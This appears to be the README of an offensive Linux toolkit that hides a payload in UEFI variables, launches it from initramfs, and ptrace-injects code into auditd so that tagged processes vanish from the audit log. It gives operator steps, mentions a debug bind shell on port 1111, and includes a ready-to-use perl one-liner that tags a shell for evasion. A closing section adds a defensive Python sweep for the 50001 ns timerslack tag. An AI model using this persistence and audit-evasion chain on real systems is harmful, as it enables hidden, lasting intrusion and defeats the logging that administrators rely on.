A sample of hiding a payload in UEFI vars that persists in initramfs and then injects into auditd to make malicious processes invisible.
- on attacker machine
  - `make`
  - copy `splat` to target
- on target
  - run `splat` as root
  - reboot target
  - use `timerslack.pl` to set your timerslack and become invisible to auditd
  - run
ORDER is a file in initramfs that specifies order of hooks, but in this case, runs stage1
Run to infect the system. Everything needed for infection is included:
- stage1
- stage2
- payload
Clobbers the fprintf symbol and keeps your tagged processes out of the audit log.
- fix up registers, because glibc's internal dlopen requires a 16-byte aligned stack on entry
- call glibc's `__libc_dlopen_mode`
- jmp back to the return value
The executable stage2:
- survive MS_MOVE in initramfs
- fanotify on systemd-sysctl
- ptrace inject into auditd
- host injected.so in a memfd
- coerce auditd to dlopen() injected.so from the memfd
- exit
Takes stage2 out of UEFI var, uncompresses, jams it into memfd, and execs stage2
Gzipped stage2d executable
This code uses code adapted from https://github.com/eklitzke/ptrace-call-userspace, a fantastic bit of code from Evan Klitzke used under the ISC license.
- ptrace `auditd`
- coerce `auditd` to call `memfd_create`
- find `__libc_dlopen_mode`
- write `injected.so` into `auditd`'s memfd
- coerce `auditd` to call `mmap`
- write `payload` into the page returned from mmap
- set `rip` to point to the shellcode
- release the process
Fantastic lib from @emptymonkey: https://github.com/emptymonkey/ptrace_do. Used under the terms of the MIT license.
Used in debugging to get a shell in the initramfs. You will need to have the `busybox-static` package installed. Enable by defining `EMBED_SHELL` to 1 and get a local bind shell on port 1111. Note that it will no longer fit into a UEFI variable because busybox is gigantic. Use `make install` and `debug_utils/install.sh` infect.
Just a simple convenience function around zlib
Simple wrapper around `prctl(PR_SET_TIMERSLACK)`. Scoff all you want, but chances are `perl` is there when you land.
Get an operator-friendly version like so:

```sh
echo "use the following:"
echo -n "echo '"
cat timerslack.pl | tr -d '\n'
echo "'|perl"
```

Which produces:

```
use the following:
echo 'require("syscall.ph");syscall(&SYS_prctl,29,50001);exec("/bin/bash");'|perl
```
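The tag that keeps a process out of the audit log is also the thing a defender can sweep for: `timerslack.pl` sets the slack to exactly 50001 ns, while the kernel default is 50000 ns. The following is an added detection example, not part of this repository; it reads `/proc/<pid>/timerslack_ns` (present since Linux 4.6, readable for other users' processes only with CAP_SYS_NICE) and the pid/value sample is constructed.

```python
import os

# timerslack.pl tags a process with prctl(PR_SET_TIMERSLACK, 50001).
# The kernel default for an ordinary process is 50000 ns, so a value of
# exactly 50001 is a cheap, high-signal indicator of a tagged process.
TAG_SLACK_NS = 50001
DEFAULT_SLACK_NS = 50000

def find_tagged(slack_by_pid, tag_ns=TAG_SLACK_NS):
    """Return the sorted pids whose timerslack equals the tag value.

    slack_by_pid maps pid -> timerslack in nanoseconds, as read from
    /proc/<pid>/timerslack_ns (or from any other collector).
    """
    return sorted(pid for pid, ns in slack_by_pid.items() if ns == tag_ns)

def find_nondefault(slack_by_pid, default_ns=DEFAULT_SLACK_NS):
    """Broader sweep: pids with any timerslack other than the default.

    Some power-management and latency-tuning tools change this legitimately,
    so treat these as leads to triage, not as verdicts.
    """
    return sorted(pid for pid, ns in slack_by_pid.items() if ns != default_ns)

def read_proc_timerslack(proc_root="/proc"):
    """Collect timerslack_ns for every process the caller may inspect.

    Reading another user's process needs CAP_SYS_NICE, so run as root for
    a complete picture; unreadable or vanished processes are skipped.
    """
    result = {}
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, name, "timerslack_ns")) as f:
                result[int(name)] = int(f.read().strip())
        except (OSError, ValueError):
            continue  # process exited, or we are not permitted to read it
    return result

# Constructed sample standing in for a /proc sweep: pid 4242 carries the tag,
# pid 77 has a legitimately raised slack, the rest sit at the kernel default.
SAMPLE = {1: 50000, 77: 200000, 4242: 50001, 9001: 50000}

if __name__ == "__main__":
    live = read_proc_timerslack() if os.path.isdir("/proc") else SAMPLE
    for pid in find_tagged(live):
        print(f"pid {pid}: timerslack == {TAG_SLACK_NS} ns, tagged for auditd evasion")
```

Pair the sweep with a cross-check of auditd's view against `/proc`: a running pid that never appears in the audit log is the symptom the tag is meant to produce.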